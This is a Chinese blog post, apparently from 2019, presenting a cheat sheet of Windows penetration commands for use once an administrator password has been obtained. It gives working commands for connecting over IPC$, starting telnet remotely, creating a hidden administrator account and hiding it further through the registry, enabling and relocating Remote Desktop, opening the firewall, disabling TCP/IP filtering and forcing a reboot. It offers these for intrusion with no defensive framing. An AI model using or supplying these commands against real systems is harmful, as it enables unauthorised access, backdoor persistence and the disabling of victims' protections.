渗透常用命令

IPC$ 入侵常用命令

假设管理员账户名密码已经得到了

net use \ip\ipc$ “密码”
/user:“用户名”  ——密码和用户名如果没有空格也可以不加引号,另外\ipc$也可以不写,如下所示: net use \ip 密码
/user:用户名 sc \ip config tlntsvr start= auto  ——注意start=后面有个空格 sc \ip
start tlntsvr telnet ip input username passwd,thus get remote pc’s
shell 当然也可以用net time \ip 配合at指令定时开启telnet或是别的服务

可以添加用户名密码并加为管理员

net user chy$ chy /add
net localgroup administrators chy$ /add   ——用户名最后加$是可以防止对方在cmd窗口下输入net user显示自己添加的用户名,当然在计算机管理下的用户还是可以显示出来的,更深层次的创建隐藏的具有管理员权限的用户需要直接对注册表操作,大致思路就是新建一个账号,然后复制管理员的注册表信息到新建账号,注册表导出,删除新建账号,再导入,这样不仅net user看不到,计算机管理也看不到,一定要在注册表中才会看到,具体操作不再细说~

关于3389终端常用命令,整理如下(摘自网上)

【注:以下命令全部为CMD命令,可在 Telnet环境下执行】

1. 查询终端端口 (适用于XP专业版、2000服务器版与2003操作系统)

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
或以下命令:
regedit /e tsp.reg “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp”
type tsp.reg

2. 开启XP&2003终端服务

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

3. 更改终端端口为20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4. 取消XP&2003系统防 火墙对终端服务3389端口的限制及IP连接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5. 开启Win2000的终端,端口为3389(需重启)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo “Enabled”=“0” >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo “ShutdownWithoutLogon”=“0” >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo “EnableAdminTSRemote”=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo “TSEnabled”=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo “Start”=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo “Start”=dword:00000002 >>2000.reg
echo [HKEY_USERS.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo “Hotkey”=“1” >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo “PortNumber”=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo “PortNumber”=dword:00000D3D >>2000.reg

6. 强行重启 Win2000&Win2003系统(执行完最后一条一句后自动重启)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7. 禁用TCP/IP端口筛选 (需重启)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8. 终端超出最大连接数时可用下面的命令来连接

mstsc /v:ip:3389 /console

posted @ 2019-12-12 23:54  SEC.VIP_网络安全服务  阅读(525)  评论(0编辑  收藏  举报